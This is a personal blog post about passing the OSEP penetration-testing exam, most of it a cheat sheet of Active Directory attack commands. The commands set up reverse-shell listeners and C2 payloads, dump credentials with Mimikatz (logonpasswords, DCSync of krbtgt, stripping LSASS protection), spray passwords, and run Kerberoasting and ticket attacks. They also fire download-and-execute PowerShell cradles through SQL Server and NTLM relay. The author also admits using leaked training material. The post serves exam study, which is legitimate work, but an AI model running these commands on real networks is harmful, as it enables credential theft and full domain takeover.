How to pass OSEP for the first time
How I passed OSEP on the first attempt

Overview of OSEP
Brief Summary: An advanced version of OSCP with a focus on Active Directory (AD).
Detailed Explanation: OSEP is an advanced penetration testing course designed for security professionals seeking to enhance their skills in bypassing modern defense mechanisms. Those who complete the course and pass the exam earn the Offensive Security Experienced Penetration Tester (OSEP) certification. The curriculum builds upon knowledge from Penetration Testing with Kali Linux (PWK) and trains students to conduct sophisticated penetration tests against mature organizations with well-established security measures.
As is standard with Offensive Security (OffSec) courses, students are provided with documentation and lab environments to engage in self-directed learning—an approach that, despite its effectiveness, some may find expensive given the course price of $1,649.

Before enrolling, my expertise was mainly in web exploitation, meaning my knowledge of Active Directory (AD) and antivirus (AV) evasion was relatively weak. This initially made me hesitate to grasp all the necessary concepts. To compensate, I dedicated two weeks to studying AV evasion techniques through MalDev Academy (leaked materials, admittedly). While the academy provided useful techniques, the focus was primarily on C/C++, which I found cumbersome. Instead, I used GitHub Copilot to convert the code into C#.

Key Recommendations:
- Familiarity with C# and PowerShell is essential. The course heavily relies on these languages, and lacking proficiency may result in difficulty keeping up.
Lab Experience
A strong aspect of OffSec courses is their practical lab environments. While OSEP includes only six labs, they are well-structured and directly aligned with the course content. Completing all six labs provides a high degree of confidence for the exam. I maintained a study schedule of approximately four hours per day, and after two months, I had completed most of the course material.
Exam Experience
OSEP offers flexibility in achieving the passing criteria. Candidates can either:
- Earn at least 100 points. Certain machines provide 20 points if privilege escalation is required. Others provide 10 points if no privilege escalation is needed. Some machines do not award any points
- Complete the exam objective (typically, retrieving the secret.txt file located deep within the environment).
My Exam Process:
- Start Time: 5:00 PM
- Initial Progress: Within two hours, I gained initial access.
- Stagnation: Over the next four hours, I encountered a roadblock. Despite using various automated reconnaissance tools, I made no significant progress.
- Switching to Manual Testing: Realizing automation was insufficient, I shifted to manual testing.

- Breakthrough: Within 30 minutes, I identified the next attack vector and the final target.
- Resting Strategy: Since the path forward was clear, I opted to sleep for eight hours before continuing.
- Completion: Upon resuming, I successfully retrieved secret.txt within five additional hours.
At this point, I had secured a passing score. However, in my workplace, there is an ongoing joke: "Either full pass or fail—there’s no in-between." Not wanting to settle for the minimum, I decided to complete the entire exam environment, which required an additional 10 hours.
Reporting & Final Steps
With the exam completed, I allocated the remaining four hours to drafting the required penetration testing report. Given the comprehensive nature of my methodology, a fully detailed report would have been excessively long. Since I had already met the passing criteria, I documented only the essential steps and backed up additional materials for reference before submitting.
With that, I wrapped up the exam process and took a well-deserved break.
Tips & Tricks
Choosing a C2 Framework
While OSEP primarily teaches Metasploit, students are free to utilize other open-source Command and Control (C2) frameworks. Based on my research, I chose Sliver as my primary C2 and Metasploit as a backup, allowing for seamless shell migration between the two.
## Setup sliver beacon
profiles new beacon --mtls --format shellcode --seconds 5 --jitter 3 primary-payload
stage-listener -u tcp:// -p primary-payload --prepend-size
## Metasploit
msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST tun0;set LPORT 443;set EnableStageEncoding true;set StageEncoder x64/xor;set ExitOnSession false;exploit -jz"
## transfer from metasploit to sliver
use windows/local/payload_inject
set payload windows/x64/custom/reverse_tcp
set session 1
set LHOST tun0
set LPORT 8080
## transfer from sliver to metaploit
msf-inject -L 192.168.13.X -l 443 -m meterpreter/reverse_tcp
What I like about Sliver is that it allows me to run .Net assembly easily and quickly, while metasploit is too long (you will feel it clearly when you encounter the article with Applocker when we have to recompile it to be able to use it with Living Off The Land Binaries, Scripts and Libraries (
## Metasploit
meterpreter > bg
use /post/windows/manage/execute_dotnet_assembly/
set DOTNET_EXE /opt/SharpCollection/Seatbelt.exe
set ARGUMENTS '-group=system'
## Sliver
seatbelt -- -group=system
sideload /home/kali/Desktop/shell/mimikatz/x64/mimikatz.exe '' \"kerberos::list /export\" \"exit\"
Of course Sliver also has its weaknesses and I used Metasploit to overcome that:
- Sliver's stage file is too big => Use Metasploit as initial access
- Sliver's access token handling ability is unstable => Use metasploit to steal or migrate to a process with another token
- Both of these tunnels are bad => Chisel
Understand the capabilities of the tools you use
I encourage you to understand some of the following tools that will make your life easier:
- Mimikatz
#export ticket
kerberos::list /export exit
#Load mimidrv
sc create mimidrv binPath= C:\inetpub\wwwroot\upload\mimidrv.sys type= kernel start= demand
sc start mimidrv
#disable lsa
!processprotect /process:lsass.exe /remove
#dump credential
sekurlsa::pth /user:Administrator /domain:hacklab.local /ntlm:b09a14d2d325026f8986d4a874fbcbc7
sideload /home/kali/Desktop/shell/mimikatz/x64/mimikatz.exe '' \"!+\" \"!processprotect /process:lsass.exe /remove\" \"exit\"
sideload /home/kali/Desktop/shell/mimikatz/x64/mimikatz.exe '' \"lsadump::dcsync / /user:corp\krbtgt\" \"exit\"
sideload /home/kali/Desktop/shell/mimikatz/x64/mimikatz.exe '' \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\"
sideload /home/kali/Desktop/shell/mimikatz/x64/mimikatz.exe '' \"privilege::debug\" \"token::elevate\" \"lsadump::secrets\" \"exit\"
- CrackMapExec
crackmapexec [protocol]
crackmapexec <protocol> --help
crackmapexec ldap -L //list Module
crackmapexec smb
#Null session unum user
crackmapexec smb -u '' -p '' --users --export $(pwd)/users.txt
sed -i "s/'/\"/g" users.txt;jq -r '.[]' users.txt > userslist.txt // extract user
#Using Krb5cc
crackmapexec smb -k --use-cache
#Enum share
crackmapexec smb -u guest -p '' --shares //Null Session
crackmapexec smb -u grace -p Inlanefreight01! --shares
crackmapexec smb -u grace -p Inlanefreight01! --spider IT --pattern txt //Find txt in share
crackmapexec smb -u grace -p Inlanefreight01! --spider IT --regex . //List ALl
crackmapexec smb -u grace -p Inlanefreight01! --spider IT --content --regex Encrypt //Search with content
crackmapexec smb -u grace -p Inlanefreight01! --share IT --get-file Creds.txt Creds.txt // download file
crackmapexec smb -u grace -p Inlanefreight01! --share IT --put-file /etc/passwd passwd // upload
crackmapexec smb -u grace -p 'Inlanefreight01!' -M spider_plus -o EXCLUDE_DIR=IPC$,print$,NETLOGON,SYSVOL
cat /tmp/cme_spider_plus/
#Spray passworod
crackmapexec smb -u users.txt -p Inlanefreight01! --continue-on-succes
crackmapexec smb -u noemi grace david carlos -p Inlanefreight01! Inlanefreight02!
crackmapexec smb -u users.txt -p passwords.txt --continue-on-succes
crackmapexec smb -u userfound.txt -p passfound.txt --no-bruteforce --continue-on-success // 1-1 on wordlist
crackmapexec smb -u Administrator -p Password@123 --local-auth //Ussing LocalAccount
smbpasswd -r -U peter //Status PASSWORD_MUST_CHANGE
crackmapexec smb -u userfound.txt -p passfound.txt --no-bruteforce --continue-on-success
crackmapexec winrm -u userfound.txt -p passfound.txt --no-bruteforce --continue-on-success //check winrm
crackmapexec ldap dc01.inlanefreight.htb -u julio grace -p Inlanefreight01! //LDAP
crackmapexec mssql -u julio grace jorge -p Inlanefreight01! //AD Account
crackmapexec mssql -u julio grace -p Inlanefreight01! -d . //Local Account
crackmapexec mssql -u julio grace -p Inlanefreight01! --local-auth //SQL Account
crackmapexec ldap dc01.inlanefreight.htb -u users.txt -p '' --asreproast asreproast.out // brute force
crackmapexec ldap dc01.inlanefreight.htb -u grace -p Inlanefreight01! --asreproast asreproast.out // search
hashcat -m 18200 asreproast.out /usr/share/wordlists/rockyou.txt // crackpassword
crackmapexec smb -u grace -p Inlanefreight01! -M gpp_autologin // grep auto login
crackmapexec smb -u grace -p Inlanefreight01! -M gpp_password
crackmapexec ldap dc01.inlanefreight.htb -u grace -p Inlanefreight01! -M user-desc
crackmapexec mssql -u grace -p Inlanefreight01! -q "SELECT name FROM master.dbo.sysdatabases"
crackmapexec mssql -u nicole -p Inlanefreight02! --local-auth -x whoami
crackmapexec mssql -u nicole -p Inlanefreight02! --local-auth --put-file /etc/passwd C:/Users/Public/passwd //upload
crackmapexec mssql -u nicole -p Inlanefreight02! --local-auth --get-file C:/Windows/System32/drivers/etc/hosts hosts //download
crackmapexec mssql -u robert -p Inlanefreight01! -M mssql_priv //check priv
crackmapexec mssql -u robert -p Inlanefreight01! -M mssql_priv -o ACTION=privesc
crackmapexec ldap dc01.inlanefreight.htb -u grace -p 'Inlanefreight01!' --kerberoasting kerberoasting.out
hashcat -m 13100 kerberoasting.out /usr/share/wordlists/rockyou.txt
crackmapexec ldap dc01.inlanefreight.htb -u robert -p Inlanefreight01! --trusted-for-delegation
crackmapexec smb -u robert -p 'Inlanefreight01!' --exec-method smbexec -x whoami
crackmapexec smb -u robert -p 'Inlanefreight01!' -M web_delivery -o URL=
proxychains4 -q crackmapexec smb -M Zerologon
proxychains4 -q crackmapexec smb -M PetitPotam
proxychains4 -q crackmapexec smb -u carole.holmes -p 'Y3t4n0th3rP4ssw0rd' -M nopac
proxychains4 -q crackmapexec smb -u carole.holmes -p 'Y3t4n0th3rP4ssw0rd' -M dfscoerce
proxychains4 -q crackmapexec smb -u carole.holmes -p 'Y3t4n0th3rP4ssw0rd' -M shadowcoerce
- Rubeus
rubeus.exe asktgt /user:harshitrajpal /password:Password@1
rubeus.exe asktgt /user:harshitrajpal /rc4:64FBAE31CC352FC26AF97CBDEF151E03
#ask TGS
rubeus.exe asktgs /user:harshitrajpal /ticket:doIFNDCCBTCgAwIBB...bA== /service:LDAP/dc1.ignite.local
#brute force
rubeus.exe brute /password:Password@1 /noticket
#Pass the Ticket
rubeus.exe ptt /ticket:doIFNDCCBTCgAwI...bA==
rubeus.exe monitor /targetuser:noob$ /interval:10
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local
rubeus.exe asreproast /spn:ldap/dc1.ignite.local/ignite.local
rubeus.exe asreproast /spn:ldap/dc1.ignite.local/ignite.local /format:hashcat
rubeus.exe changepw /ticket:doIFNDCC...bA== /new:Password@1!!!
rubeus.exe changepw /targetuser:ignite.local\mufasa /ticket:doIFNDCC...bA== /new:Password@1!!!
- SQLRecon
sqlrecon '' -a Windows -s sql05 -m whoami
sqlrecon '' -a Windows -s sql05 -m smb -o \\\\\\nothing
sqlrecon '' -a Local -s localhost -u webapp11 -p 89543dfGDFGH4d -m lwhoami -l sql27
sqlrecon '' -a Local -s localhost -u webapp11 -p 89543dfGDFGH4d -m lenablexp -l sql27
sqlrecon '' -a Local -s localhost -u webapp11 -p 89543dfGDFGH4d -m lxpcmd -l sql27 -o \"powershell iex(irm -uri\"
- PowerUpSQL
sharpsh '' -u -c \"Get-SQLInstanceLocal | Get-SQLServerInfo\"
sharpsh -t 300 '' -u -c \"Get-SQLServerLink\"
sharpsh -t 300 '' -u -c \"Get-SqlServerLinkCrawl -username webapp11 -password 89543dfGDFGH4d\"
Get-SQLInstanceDomain | Get-SQLServerInfo
Get-SQLServerInfo -Instance TARGETSERVER
Invoke-SQLAudit -Verbose -Instance TARGETSERVER
Get-SQLQuery -Query "SELECT system_user" -Instance TARGETSERVER
Get-SqlServerLinkCrawl -Instance TARGETSERVER | select instance,links | ft
Get-SqlServerLinkCrawl -Instance TARGETSERVER -Query "select * from master..syslogins" | ft
- Impacket
proxychains impacket-ntlmrelayx --no-http-server -smb2support -t -c 'powershell iex(irm -uri'
proxychains impacket-secretsdump -k -no-pass dmzdc01.COMPLYEDGE.COM
proxychains impacket-getTGT -dc-ip -hashes aad3b435b51404eeaad3b435b51404ee:e48c13cefd8f9456d79cd49651c134e8
- BloodHound
sudo neo4j console
./BloodHound --no-sandbox
execute-assembly -t 300 /home/kali/Desktop/shell/csharp/SharpHound.exe --CollectionMethods All,GPOLocalGroup,LoggedOn --ZipFileName -SearchForest --Domain
execute-assembly -t 300 /home/kali/Desktop/shell/csharp/SharpHound.exe --CollectionMethods All,GPOLocalGroup,LoggedOn --ZipFileName --ldapusername adminWebSvc
sharp-hound-4 '' -c All,GPOLocalGroup,LoggedOn --ZipFileName
sharp-hound-4 '' -c All,GPOLocalGroup,LoggedOn --ZipFileName -s --Domain
sharp-hound-4 '' -c All,GPOLocalGroup,LoggedOn --ZipFileName -s --Domain
Final Thought
- Be lazy and find the least laborious way but also be prepared to do everything manually =))
- As usual, I think Offsec provides advanced foundational knowledge and you will have to dig deep yourself
- Never trust MS documents, they are deceptive =))
- Sigh, finally have to learn PWN 😬😬